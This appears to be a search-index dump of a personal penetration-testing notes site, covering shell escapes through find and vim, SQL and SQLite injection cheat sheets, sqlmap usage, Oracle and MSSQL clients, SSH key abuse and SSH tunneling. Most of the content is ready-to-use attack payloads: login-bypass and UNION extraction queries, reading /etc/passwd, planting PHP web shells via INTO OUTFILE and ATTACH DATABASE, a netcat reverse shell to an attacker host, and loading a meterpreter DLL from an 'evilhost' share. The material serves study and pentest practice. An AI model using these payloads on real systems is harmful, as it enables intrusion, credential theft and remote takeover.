                        find / -name nameoffile -exec /bin/awk 'BEGIN {system(\"/bin/sh\")}' \\;\n# This use of the find command is searching for any file listed after the -name option, then it executes awk (/bin/awk) and runs the same script we discussed in the awk section to execute a shell interpreter.\n\nfind . -exec /bin/sh \\; -quit\n# This use of the find command uses the execute option (-exec) to initiate the shell interpreter directly. If find can't find the specified file, then no shell will be attained.\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#vim","title":"VIM","text":"
                        vim -c ':!/bin/sh'\n

                        VIM escape:

                        vim\n:set shell=/bin/sh\n:shell\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"sqli-manual-attack/","title":"SQLi Cheat sheet for manual injection","text":"

                        Resources

                        • See a more detailed explanation about SQL injection.
                        • PayloadsAllTheThings Original payloads for different SQL databases.
                        OWASP

                        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.5. Testing for SQL Injection

                        ID Link to Hackinglife Link to OWASP Description 7.5 WSTG-INPV-05 Testing for SQL Injection - Identify SQL injection points. - Assess the severity of the injection and the level of access that can be achieved through it. Languages and dictionaries Server Dictionary MySQL MySQL payloads. MSSQL MSSQL payloads. PostgreSQL PostgreSQL payloads. Oracle Oracle SQL payloads. SQLite SQLite payloads. Cassandra Cassandra payloads. Attack-based dictionaries
                        • Generic SQL Injection Payloads
                        • Generic Error Based Payloads.
                        • Generic Union Select Payloads.
                        • SQL time based payloads .
                        • SQL Injection Auth Bypass Payloads
                        ","tags":["pentesting"]},{"location":"sqli-manual-attack/#comment-injection","title":"Comment injection","text":"

                        Put a line comment at the end to comment out the rest of the query.

                        Valid for MySQL, SQL Server, PostgreSQL, Oracle, SQLite:

                        -- comment      // MySQL [Note the space after the double dash]\n--comment       // MSSQL\n--comment       // PostgreSQL\n--comment       // Oracle\n\n\n/*comment*/     // MySQL\n/*comment*/     // MSSQL\n/*comment*/     // PostgreSQL\n\n#comment        // MySQL\n
                        ","tags":["pentesting"]},{"location":"sqli-manual-attack/#boolean-based-testing","title":"Boolean-based testing","text":"","tags":["pentesting"]},{"location":"sqli-manual-attack/#integer-based-parameter-injection","title":"Integer based parameter injection","text":"

                        Common in Integer based parameter injection such as:

                        URL: https://site.com/user.php?id=1\nSQL query: SELECT * FROM users WHERE id= FUZZ;\n

                        Typical payloads for that query:

                        # Return true\nAND 1\nAnd true\n\n# Return False\nAND 0\nAnd false\n\n# Return 56 if vulnerable\n1*56\n\n# Return 1 if not vulnerable\n1*56\n
                        ","tags":["pentesting"]},{"location":"sqli-manual-attack/#string-based-parameter-injection","title":"String based parameter injection","text":"
                        URL: https://site.com/user.php?id=alexis\nSQL query: SELECT * FROM users WHERE name= 'FUZZ';\n

                        Typical payloads for that query:

                        # Return true\n''\n\"\"\n\n# Return false\n'\n\"\n

                        Exploiting single quote ('): In SQL, the single quote is used to delimit string literals. A way to exploit this is in a Login form:

                        # SQL query\nSELECT * FROM users WHERE username = '<username>' AND password = '<password>'\n\n# Payload\n' OR '1'='1'; --\n\n# The attacker's injected SQL code ' OR '1'='1'; -- causes the condition '1'='1' to evaluate to true, effectively bypassing the\nauthentication mechanism. Modified query would became\nSELECT * FROM users WHERE username = '' OR '1'='1'; -- ' AND password = '<password>'\n
                        ","tags":["pentesting"]},{"location":"sqli-manual-attack/#error-based-testing","title":"Error-based testing","text":"Dictionaries

                        https://github.com/amandaguglieri/dictionaries/blob/main/SQL/error-based

                        Firstly, every DBMS/RDBMS responds to incorrect/erroneous SQL queries with different error messages, so an error response can be use to fingerprint the database:

                        A typical error from MS-SQL will look like this:

                        Incorrect syntax near [query snippet]\n

                        While a typical MySQL error looks more like this:

                        You have an error in your SQL syntax. Check the manual that corresponds\nto your MySQL server version for the right syntax to use near [query\nsnippet]\n
                        ","tags":["pentesting"]},{"location":"sqli-manual-attack/#union-attack","title":"UNION attack","text":"Dictionaries

                        https://github.com/amandaguglieri/dictionaries/blob/main/SQL/union-select

                        ","tags":["pentesting"]},{"location":"sqli-manual-attack/#mysql","title":"MYSQL","text":"
                        #########\nMYSQL\n#########\n\n# Access (using null characters)\n' OR '1'='1' %00\n' OR '1'='1' %16\n\n\n\n# 1. Bypass a form      \n1' OR '1'='1';#\n' OR '1'='1';#\n1' OR '1'='1';-- - \n' OR '1'='1';-- -  \n\n\n# 2. Number of columns (UNION attack)\n1' OR '1'='1' order by 1;#\n1' OR '1'='1' order by 2;#\n1' OR '1'='1' order by 3;#\n...\n# Do this until you get an error message and then you will know the number of columns\n# Another method to see the number of columns. \n' OR '1'='1' order by 1;-- -   \n\n# 3. Get which column is being displayed. For instance, when we know we have 6 columns:\n1' OR '1'='1' UNION SELECT 1,2,3,4,5,6;# \n\n# 4. Get names of all databases \n1' OR '1'='1' UNION SELECT null,table_schema,null,null,null,null,null FROM information_schema.tables;#\n# 4. Get names of all databases in SQLite (name and schema of the tables stored in the database).\na' or '1'='1' union select tbl_name,2,3,4,5 from sqlite_master --\n\n\n# 5. Get names of all tables from the selected database\n1' OR '1'='1' UNION SELECT null,table_name,null,null,null,null FROM information_schema.tables;# \n\n\n# 6. Get the name of all columns of a selected table from a selected database\n1' OR '1'='1' UNION SELECT null,column_name,null,null,null,null FROM information_schema.columns WHERE table_name='users';#\n\n\n# 7. Get the value of a selected column (for instance, password)\n1' OR '1'='1' UNION SELECT null,passwords,null,null,null,null FROM users;#\n\n1' OR '1'='1' UNION SELECT null,passwords,null,null,null,null FROM <databaseName.tableName>;#\n
                        ","tags":["pentesting"]},{"location":"sqli-manual-attack/#sqlite","title":"SQLite","text":"
                        #########\nSQLite\n#########\n\n# Ensure that the targeted parameter is vulnerable\n1' a' or '1'='1' --\n\n# Determine the number of columns of the query\n1' a' or '1'='1' order by 1 -- //returns all results\n1' a' or '1'='1' order by 2 -- //returns all results\n1' a' or '1'='1' order by 3 -- //returns all results\n1' a' or '1'='1' order by 4 -- //returns all results\n1' a' or '1'='1' order by 5 -- //returns all results\n1' a' or '1'='1' order by 6 -- //returns none\n# Therefore the query contains 5 columns.\n\n# Determine which columns are being returned\n1' a' or '1'='1' UNION SELECT 1,2,3,4,5 -- \n# The table in this demo returned values 1,3,4,5. Value 2 was not returned.\n\n# Extract version of sqlite database\n1' a' or '1'='1' UNION SELECT sqlite_version,NULL,NULL,NULL,NULL -- \n\n# Determine the name and schema of the tables stored in the database.\na' or '1'='1' union select tbl_name,2,3,4,5 from sqlite_master --\n\n# Determine the SQL command used to construct the tables:\na' or '1'='1' union select sql,2,3,4,5 from sqlite_master --\n# In this demo it returned:\n1   CREATE TABLE results (rollno text primary key, email text, name text, marks real, rank integer) 4   5\n1   CREATE TABLE secret_flag (flag text, value text)    4   5\n\n# Retrieve two columns from a table\na' or '1'='1' union select flag,2,value,4,5 from secret_flag --\n

                        Also, once we know which column is injectable, there are some php functions that can provide us some worthy knowing data:

                        database()\nuser()\nversion()\nsqlite_version()\n

                        Also, interesting payloads for retrieving concatenates values in a UNION based attack:

                        ## Extract database names, table names and column names\n\n#Database names\n-1' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata\n\n#Tables of a database\n-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,table_name,0x7C) fRoM information_schema.tables wHeRe table_schema=[database]\n\n#Column names\n-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,column_name,0x7C) fRoM information_schema.columns wHeRe table_name=[table name]\n

                        And here an example of how to retrieve them:

                        # if injectable columns are number 2, 3 and 4 you can display some info from the system\nunion select 1, database(),user(),version(),5\n\n# Extra bonus\n# You can also load a file from the system with\nunion select 1, load_file(/etc/passwd),3,4,5\n\n# and you can try to write to a file in the server\nunion select 1,'example example',3,4,5 into outfile '/var/www/path/to/file.txt'\nunion select 1,'example example',3,4,5 into outfile '/tmp/file.txt'\n\n# and we can combine that with a reverse shell like\nunion select 1,'<?passthru(\"nc -e /bin/sh <attacker IP> <attacker port>\") ?>', 3,4,5 into outfile '/tmp/reverse.php'\n
                        ","tags":["pentesting"]},{"location":"sqli-manual-attack/#sqli-blind-attack","title":"SQLi Blind attack","text":"

                        Firstly you need to check the application response to different requests (and/or with false true statements). If you can tell true responses from false responses and validate that the application is processing the boolean values, then you can apply this technique. For that purpose the operator AND is more valuable.

                        ","tags":["pentesting"]},{"location":"sqli-manual-attack/#boolean-based","title":"Boolean based","text":"Dictionaries

                        https://github.com/amandaguglieri/dictionaries/blob/main/SQL/error-based

                        user() returns the name of the user currently using the database. substring() returns a substring of the given argument. It takes three parameters: the input string, the position of the substring and its length.

                        Boolean based query:

                        ' OR substring(user(), 1, 1) = 'a\n' OR substring(user(), 1, 1) = 'b\n

                        More interesting queries:

                        # Database version\n1 and substring(version(), 1, 1) = 4--\n\n# Check that second character of the column user_email for user_name admin from table users is greater than the 'c' character  \n1 and substring((SELECT user_email FROM users WHERE user_name = 'admin'),2,1) > 'c'\n
                        ","tags":["pentesting"]},{"location":"sqli-manual-attack/#time-based","title":"Time based","text":"Dictionaries

                        https://github.com/amandaguglieri/dictionaries/blob/main/SQL/time-based

                        Resources

                        • OWASP resources

                        Vulnerable SQL query:

                        SELECT * from users WHERE username = '[username]' AND password = '[password]';\n

                        Time base query:

                        ' OR SLEEP(5) -- '\n

                        Interesting queries:

                        1' AND SUBSTRING(user(), 1, 1 = 'r') sleep(0), sleep(10));#\n

                        Examples of available wait/timeout functions include:

                        • WAITFOR DELAY '0:0:10'\u00a0in SQL Server
                        • BENCHMARK()\u00a0and\u00a0sleep(10)\u00a0in MySQL
                        • pg_sleep(10)\u00a0in PostgreSQL
                        \n
                        ","tags":["pentesting"]},{"location":"sqli-manual-attack/#extra-bonus-bypassing-quotation-marks","title":"Extra Bonus: Bypassing quotation marks","text":"

                        Sometimes quotation marks get filtered in SQL queries. To bypass that when querying some tablename, maybe we can skip quotation marks by entering tablename directly in HEX values.

                        More bypassing tips:

                        # Using mingled upper and lowercase\n\n# Using spaces url encoded\n+\n\n# Using comments\n/**/\n/**\n--\n; --\n; /*\n; //\n\n# Example of bypassing webpages that only displays one value at a time\n1'+uNioN/**/sEleCt/**/table_name,2+fROm+information_schema.tables+where+table_schema?'dvwa'+limit+1,1%23&Submit=Submit#\n
                        ","tags":["pentesting"]},{"location":"sqli-manual-attack/#extra-bonus-gaining-a-reverse-shell-from-sql-injection","title":"Extra Bonus: Gaining a reverse shell from SQL injection","text":"

                        Take a wordpress installation that uses a mysql database. If you manage to login into the mysql pannel (/phpmyadmin) as root then you could upload a php shell to the /wp-content/uploads/ folder.

                        Select \"<?php echo shell_exec($_GET['cmd']);?>\" into outfile \"/var/www/https/blogblog/wp-content/uploads/shell.php\";\n
                        ","tags":["pentesting"]},{"location":"sqli-manual-attack/#extra-bonus-dual","title":"Extra Bonus: DUAL","text":"

                        The DUAL is a special one row, one column table present by default in all Oracle databases. The owner of DUAL is SYS, but DUAL can be accessed by every user. This is a possible payload for SQLi:

                        '+UNION+SELECT+NULL+FROM+dual--\n

                        Oracle syntax requires the use of FROM, but some queries don't requires any table. For these case we use DUAL. Also Oracle doesn't allow the queries that employ information_schema.tables.

                        ","tags":["pentesting"]},{"location":"sqlite/","title":"SQLite injections","text":"","tags":["database","relational","database","SQL"]},{"location":"sqlite/#basic-payloads","title":"Basic payloads","text":"
                        # Ensure that the targeted parameter is vulnerable\n1' a' or '1'='1' --\n\n# Determine the number of columns of the query\n1' a' or '1'='1' order by 1 -- //returns all results\n1' a' or '1'='1' order by 2 -- //returns all results\n1' a' or '1'='1' order by 3 -- //returns all results\n1' a' or '1'='1' order by 4 -- //returns all results\n1' a' or '1'='1' order by 5 -- //returns all results\n1' a' or '1'='1' order by 6 -- //returns none\n# Therefore the query contains 5 columns.\n\n# Determine which columns are being returned\n1' a' or '1'='1' UNION SELECT 1,2,3,4,5 -- \n# The table in this demo returned values 1,3,4,5. Value 2 was not returned.\n\n# Extract version of sqlite database\n1' a' or '1'='1' UNION SELECT sqlite_version,NULL,NULL,NULL,NULL -- \n\n# Determine the name and schema of the tables stored in the database.\na' or '1'='1' union select tbl_name,2,3,4,5 from sqlite_master --\n\n# Determine the SQL command used to construct the tables:\na' or '1'='1' union select sql,2,3,4,5 from sqlite_master --\n# In this demo it returned:\n1   CREATE TABLE results (rollno text primary key, email text, name text, marks real, rank integer) 4   5\n1   CREATE TABLE secret_flag (flag text, value text)    4   5\n\n# Retrieve two columns from a table\na' or '1'='1' union select flag,2,value,4,5 from secret_flag --\n

                        Source: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md

                        # SQLite comments\n--\n/**/\n\n# SQLite version\nselect sqlite_version();\n\n# String based: Extract database structure\nSELECT sql FROM sqlite_schema\n\n# \\Integer or String based: Extract table name\nSELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'\n\n# \\Integer or String based: Extract column name\nSELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'\n\n# For a clean output\nSELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),\"TEXT\",''),\"INTEGER\",''),\"AUTOINCREMENT\",''),\"PRIMARY KEY\",''),\"UNIQUE\",''),\"NUMERIC\",''),\"REAL\",''),\"BLOB\",''),\"NOT NULL\",''),\",\",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'\n\n# Cleaner output\nSELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name');\n\n# \\Boolean: Count number of tables\nand (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table\n\n# \\Boolean: Enumerating table name\n\nand (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number\n\n# \\Boolean:  Extract info\nand (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')\n\n# \\Boolean: Extract info (order by)\nCASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) = hex('some_char') THEN <order_element_1> ELSE <order_element_2> END\n\n# \\Boolean: Error based\nAND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END\n\n# \\Time based\nAND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))\n
                        ","tags":["database","relational","database","SQL"]},{"location":"sqlite/#remote-command-execution-using-sqlite-command-attach-database","title":"Remote Command Execution using SQLite command - Attach Database","text":"
                        ATTACH DATABASE '/var/www/lol.php' AS lol;\nCREATE TABLE lol.pwn (dataz text);\nINSERT INTO lol.pwn (dataz) VALUES (\"<?php system($_GET['cmd']); ?>\");--\n
                        ","tags":["database","relational","database","SQL"]},{"location":"sqlite/#remote-command-execution-using-sqlite-command-load_extension","title":"Remote Command Execution using SQLite command - Load_extension","text":"
                        UNION SELECT 1,load_extension('\\\\evilhost\\evilshare\\meterpreter.dll','DllMain');--\n
                        ","tags":["database","relational","database","SQL"]},{"location":"sqlite/#references","title":"References","text":"

                        Injecting SQLite database based application - Manish Kishan Tanwar SQLite Error Based Injection for Enumeration

                        ","tags":["database","relational","database","SQL"]},{"location":"sqlmap/","title":"sqlmap - A tool for testing SQL injection","text":"","tags":["pentesting"]},{"location":"sqlmap/#get-parameter","title":"GET parameter","text":"
                        sqlmap -u \u2018http://victim.site/view.php?id=112\u2019 -p id --technique=U\n# -p: to indicate an injectable parameter \n# --technique=U  //to indicate a UNION based SQL injection technique // E: error based  // \n# -b: banner of the database\n# --tor: to use a proxy to connect to the target URL\n# -v3: to see the payloads that sqlmap is using\n# --flush-session: to refresh sessions\n# --tamper: default tampers are in /usr/share/sqlmap/tamper\n
                        ","tags":["pentesting"]},{"location":"sqlmap/#post-parameter","title":"POST parameter","text":"
                        sqlmap -u <URL> --data=<POST string> -p parameter [options]\n
                        ","tags":["pentesting"]},{"location":"sqlmap/#using-r-file","title":"Using -r file","text":"

                        Capture the request with burpsuite and save it to a file.

                        # Get all databases\nsqlmap -r nameoffiletoinject --method POST --data \"parameter=lala\" -p parameter --dbs    \n\n# Get all tables \nsqlmap -r nameoffiletoinject --tables\n\n# Get all columns of a given database dwva\nsqlmap -r nameoffiletoinject --current-db dwva -columns\n\n# Get all tables of a given database, for example dwva\nsqlmap -r nameoffiletoinject -D dwva --tables\n\n# Get all columns of a given table in a given database\nsqlmap -r nameoffiletoinject -D dwva -T users --columns\n\n# Dump users table\nsqlmap -r nameoffiletoinject -D dwva -T users --dump\n\n# Get columns username and password of table users from table dwva\nsqlmap -r nameoffiletoinject -D dwva -T users -C username,password --dump\n\n# Automatically attempt to upload a web shell using the vulnerable parameter and execute it\nsqlmap -r nameoffiletoinject -p vuln-param -os-shell \n\n# Alternatively use the os-pwn option to gain a shell using meterpreter or vnc \nsqlmap -r nameoffiletoinject -p vuln-param -os-pwn \n
                        ","tags":["pentesting"]},{"location":"sqlmap/#using-url","title":"Using URL","text":"

                        You can also provide the url with --url or -u

                        sqlmap --url \u2018http://victim.site\u2019  --dbs --batch //\nsqlmap --url \u2018http://victim.site\u2019  --users // gets users\nsqlmap --url \u2018http://victim.site\u2019  --tables // gets all tables\nsqlmap --url \u2018http://victim.site\u2019  --batch //\n\n\n# Check what users we have and which privileges that user has.\nsqlmap -u $IP/path.php --forms --cookie=\"PHPSESSID=v5098os3cdua2ps0nn4ueuvuq6\" --batch --users\n\n# Dump the password hash for an user (postgres in the example) and exploit that super permission.\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=e14ch3u8gfbq8u3h97t8bqss9o\" -U postgres --password --batch\n\n# Get a shell \nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=e14ch3u8gfbq8u3h97t8bqss9o\" --batch --os-shell                  \n
                        ","tags":["pentesting"]},{"location":"sqlmap/#getting-a-direct-sql-shell","title":"Getting a direct SQL Shell","text":"
                        # Get a OS shell\nsqlmap --url \u2018http://victim.site\u2019  --os-shell\n\n# GEt a SQL shell\nsqlmap --url \u2018http://victim.site\u2019  --sql-shell\n
                        ","tags":["pentesting"]},{"location":"sqlmap/#suffixes-and-preffixes","title":"Suffixes and preffixes","text":"","tags":["pentesting"]},{"location":"sqlmap/#set-a-suffix","title":"Set a suffix","text":"
                        sqlmap -u \"http://example.com/?id=1\"  -p id --suffix=\"-- \"\n
                        ","tags":["pentesting"]},{"location":"sqlmap/#prefix","title":"Prefix","text":"
                        sqlmap -u \"http://example.com/?id=1\"  -p id --prefix=\"') \"\n
                        ","tags":["pentesting"]},{"location":"sqlmap/#injections-in-headers-and-other-http-methods","title":"Injections in Headers and other HTTP Methods","text":"
                        #Inside cookie\nsqlmap  -u \"http://example.com\" --cookie \"mycookies=*\"\n\n#Inside some header\nsqlmap -u \"http://example.com\" --headers=\"x-forwarded-for:127.0.0.1*\"\nsqlmap -u \"http://example.com\" --headers=\"referer:*\"\n\n#PUT Method\nsqlmap --method=PUT -u \"http://example.com\" --headers=\"referer:*\"\n\n#The injection is located at the '*'\n
                        ","tags":["pentesting"]},{"location":"sqlmap/#tampers","title":"Tampers","text":"
                        sqlmap -r request.txt --tamper=space2comment\n# space2comment: changes whitespace to /**/\n
                        Tamper Description apostrophemask.py Replaces apostrophe character with its UTF-8 full width counterpart apostrophenullencode.py Replaces apostrophe character with its illegal double unicode counterpart appendnullbyte.py Appends encoded NULL byte character at the end of payload base64encode.py Base64 all characters in a given payload between.py Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' bluecoat.py Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator chardoubleencode.py Double url-encodes all characters in a given payload (not processing already encoded) commalesslimit.py Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' commalessmid.py Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' concat2concatws.py Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' charencode.py Url-encodes all characters in a given payload (not processing already encoded) charunicodeencode.py Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded). \"%u0022\" charunicodeescape.py Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded). \"\\u0022\" equaltolike.py Replaces all occurances of operator equal ('=') with operator 'LIKE' escapequotes.py Slash escape quotes (' and \") greatest.py Replaces greater than operator ('>') with 'GREATEST' counterpart halfversionedmorekeywords.py Adds versioned MySQL comment before each keyword ifnull2ifisnull.py Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' modsecurityversioned.py Embraces complete query with versioned comment modsecurityzeroversioned.py Embraces complete query with zero-versioned comment multiplespaces.py Adds multiple spaces around SQL keywords nonrecursivereplacement.py Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace(\"SELECT\", \"\")) filters percentage.py Adds a percentage sign ('%') infront of each character overlongutf8.py Converts all characters in a given payload (not processing already encoded) randomcase.py Replaces each keyword character with random case value randomcomments.py Add random comments to SQL keywords securesphere.py Appends special crafted string sp_password.py Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs space2comment.py Replaces space character (' ') with comments space2dash.py Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\\n') space2hash.py Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\\n') space2morehash.py Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\\n') space2mssqlblank.py Replaces space character (' ') with a random blank character from a valid set of alternate characters space2mssqlhash.py Replaces space character (' ') with a pound character ('#') followed by a new line ('\\n') space2mysqlblank.py Replaces space character (' ') with a random blank character from a valid set of alternate characters space2mysqldash.py Replaces space character (' ') with a dash comment ('--') followed by a new line ('\\n') space2plus.py Replaces space character (' ') with plus ('+') space2randomblank.py Replaces space character (' ') with a random blank character from a valid set of alternate characters symboliclogical.py Replaces AND and OR logical operators with their symbolic counterparts (&& and unionalltounion.py Replaces UNION ALL SELECT with UNION SELECT unmagicquotes.py Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) uppercase.py Replaces each keyword character with upper case value 'INSERT' varnish.py Append a HTTP header 'X-originating-IP' versionedkeywords.py Encloses each non-function keyword with versioned MySQL comment versionedmorekeywords.py Encloses each keyword with versioned MySQL comment xforwardedfor.py Append a fake HTTP header 'X-Forwarded-For'","tags":["pentesting"]},{"location":"sqlplus/","title":"sqlplus - To connect and manage the Oracle RDBMS","text":"

                        SQL Plus is a command-line tool that provides access to the Oracle RDBMS. SQLPlus enables you to:

                        • Enter SQLPlus commands to configure the SQLPlus environment.
                        • Startup and shutdown an Oracle database.
                        • Connect to an Oracle database.
                        • Enter and execute SQL commands and PL/SQL blocks.
                        • Format and print query results.
                        ","tags":["oracle tns","port 1521","tools"]},{"location":"sqlplus/#connect-to-oracle-database","title":"Connect to Oracle database","text":"

                        If we manage to get some credentials we can connect to the Oracle TNS service with sqlplus.

                        sqlplus <username>/<password>@$ip/XE;\n

                        In case of this error message ( sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory), there might be an issue with libraries. Possible solution:

                        sudo sh -c \"echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf\";sudo ldconfig\n
                        ","tags":["oracle tns","port 1521","tools"]},{"location":"sqlplus/#basic-commands","title":"Basic commands","text":"

                        All commands from Oracle's documentation.

                        # List all available tables in the current database\nselect table_name from all_tables;\n\n# Show the privileges of the current user\nselect * from user_role_privs;\n
                        ","tags":["oracle tns","port 1521","tools"]},{"location":"sqsh/","title":"sqsh","text":"","tags":["database","cheat sheet","mssql"]},{"location":"sqsh/#installation","title":"Installation","text":"

                        Pre-installed in Kali. Used to interact with MSSQL (Microsoft SQL Server) from Linux.

                         # Connect to mssql server\n sqsh -S $IP -U username -P Password123 -h\n # -h: disable headers and footers for a cleaner look.\n\n# When using Windows Authentication, we need to specify the domain name or the hostname of the target machine. If we don't specify a domain or hostname, it will assume SQL Authentication.\nsqsh -S $ip -U .\\\\<username> -P 'MyPassword!' -h\n# For windows authentication we can use  SERVERNAME\\\\accountname or .\\\\accountname\n

                        When connected to msSQL, all commands will be executed after the GO command.

                        ","tags":["database","cheat sheet","mssql"]},{"location":"ssh-audit/","title":"ssh-audit","text":""},{"location":"ssh-audit/#installation","title":"Installation","text":"

                        Download from github repo: https://github.com/jtesta/ssh-audit.

                        git clone https://github.com/jtesta/ssh-audit.git \n
                        "},{"location":"ssh-audit/#basic-usage","title":"Basic usage","text":"
                        ./ssh-audit.py $ip\n
                        "},{"location":"ssh-for-github/","title":"SSH for github","text":""},{"location":"ssh-for-github/#how-to-configure-multiple-two-or-more-deploy-keys-for-different-private-github-repositories-on-the-same-computer-without-using-ssh-agent","title":"How to configure multiple two or more deploy keys for different private github repositories on the same computer without using ssh-agent","text":"

                        Let's say I want to have a ssh key A for repo1 and ssh key b for repo2.

                        1. Create a ssh pair keys for each repository
                        ssh-keygen -t ed25519 -C \"your_email@example.com\"\n# ed25519 is the algorithm\n

                        For the second key and the subsequent ones, you will need to specify a different name.

                        • Private key should have permissions set to 600.
                        • .ssh folder should have permissions set to 700.

                        • Add your SSH keys to the ssh-agent. In my case

                        # start the ssh-agent in the background\neval \"$(ssh-agent -s)\"\n\n# add your ssh private key to the ssh-agent.\nssh-add ~/.ssh/id_ed25519\n
                        1. Add your ssh public keys as deploy keys in the Settings tab of repo1 and repo2 .

                        2. Edit .git/config file in both repositories.

                        # For repo1\n[remote \"origin\"]\n        url = \"ssh://git@repo1.github.com:username/repo1.git\"\n\n# For repo2\n[remote \"origin\"]\n        url = \"ssh://git@repo2.github.com:username/repo2.git\"\n
                        1. For each repo set name and email
                        # navigate to your repo1\ngit config user.name \"yourName1\"\ngit config user.email \"email1@domain.com\"\n\n# navigate to your repo2\ngit config user.name \"name2\"\ngit config user.email \"email2@domain.com\"\n
                        1. Create a config file in .ssh to manage keys:
                        # Default github account: username1\nHost github.com/username1\n   HostName github.com\n   IdentityFile ~/.ssh/username1_private_key\n   IdentitiesOnly yes\n\n# Other github account: username2\nHost github.com/username2\n   HostName github.com\n   IdentityFile ~/.ssh/username2_private_key\n   IdentitiesOnly yes\n
                        1. Make sure you don't have all credentials cached in your ssh agent
                        ssh-add -D\n
                        1. Add new credentials to your ssh agent
                        ssh-add ~/.ssh/username1_private_key\nssh-add ~/.ssh/username2_private_key\n
                        1. See added keys
                        ssh-add -l\n
                        1. Test your conection
                        ssh -T git@github.com\n
                        "},{"location":"ssh-keys/","title":"SSH keys","text":"","tags":["pentesting","privilege escalation","linux"]},{"location":"ssh-keys/#read-access-to-ssh","title":"Read access to .ssh","text":"

                        Having read access over the .ssh directory for a specific user, we may read their private ssh keys found in /home/user/.ssh/id_rsa or /root/.ssh/id_rsa, and we can copy it to our machine and use the -i flag to log in with it:

                        vim id_rsa\nchmod 600 id_rsa\n# If ssh keys have lax permissions, i.e., maybe read by other people, the ssh server would prevent them from working.\nssh user@10.10.10.10 -i id_rsa\n
                        ","tags":["pentesting","privilege escalation","linux"]},{"location":"ssh-keys/#write-access-to-ssh","title":"Write access to .ssh","text":"

                        Having write access over the .ssh directory for a specific user, we may place our public key in /home/user/.ssh/authorized_keys.

                        But for this we need to have gained access first as that user. With this technique we obtain ssh access to the machine.

                        # Generating a public private rsa key pair\nssh-keygen -f key\n

                        This will give us two files:\u00a0key\u00a0(which we will use with\u00a0ssh -i) and\u00a0key.pub, which we will copy to the remote machine.

                        Let us copy\u00a0key.pub, then on the remote machine, we will add it into\u00a0/root/.ssh/authorized_keys:

                        ","tags":["pentesting","privilege escalation","linux"]},{"location":"ssh-tunneling/","title":"ssh tunneling","text":"

                        title: SSH tunneling author: amandaguglieri TableOfContents: true draft:false

                        "},{"location":"ssh-tunneling/#ssh-tunneling","title":"SSH tunneling","text":""},{"location":"ssh-tunneling/#local-port-forwarding","title":"Local port forwarding","text":"

                        In this example we will use this tunneling as a way to access locally to a remote postgresql service:

                        1. In the attacking machine:
                        ssh UserNameInTheAttackedMachine@IPOfTheAttackedMachine -L 1234:localhost:5432 \n# We will listen for incoming connections on our local port 1234. When a client connects to our local port, the SSH client will forward the connection to the remote server on port 22. This allows the local client to access services on the remote server as if they were running on the local machine.\n# We are forwarding traffic from any given local port, for instance 1234, to the port on which PostgreSQL is listening, namely 5432, on the remote server. We therefore specify port 1234 to the left of localhost, and 5432 to the right, indicating the target port.\n
                        1. In another terminal in the attacking machine:
                        sudo apt update && sudo apt install postgresql postgresql-client-common \n# this will install postgresql in case you don't have it.\n\npsql -U christine -h localhost -p 1234\n# Using our installation of psql, we can now interact with the PostgreSQL service running locally on the target machine:\n# -U: to specify user.\n# -h: to specify localhost. \n# -p 1234 as we are targeting the tunnel we created earlier with SSH, we need to specify which is the port the tunnel is listening on.\n
                        "},{"location":"ssh-tunneling/#dynamic-port-forwarding","title":"Dynamic Port Forwarding","text":"

                        Unlike local port forwarding and remote port forwarding, which use a specific local and remote port (earlier we used 1234 and 5432, for instance), dynamic port forwarding uses a single local port and dynamically assigns remote ports for each connection.

                        To use dynamic port forwarding with SSH, you can use the ssh command with the -D option, followed by the local port, the remote host and port, and the remote SSH server. For example, the following command will forward traffic from the local port 1234 to the remote server on port 5432, where the PostgreSQL server is running:

                        ssh UserNameInTheAttackedMachine@IPOfAttackedMachine -D 1234 \n# -f send the command to the shell's background right before executing it remotely\n# -N tells SSH not to execute any commands remotely.\n

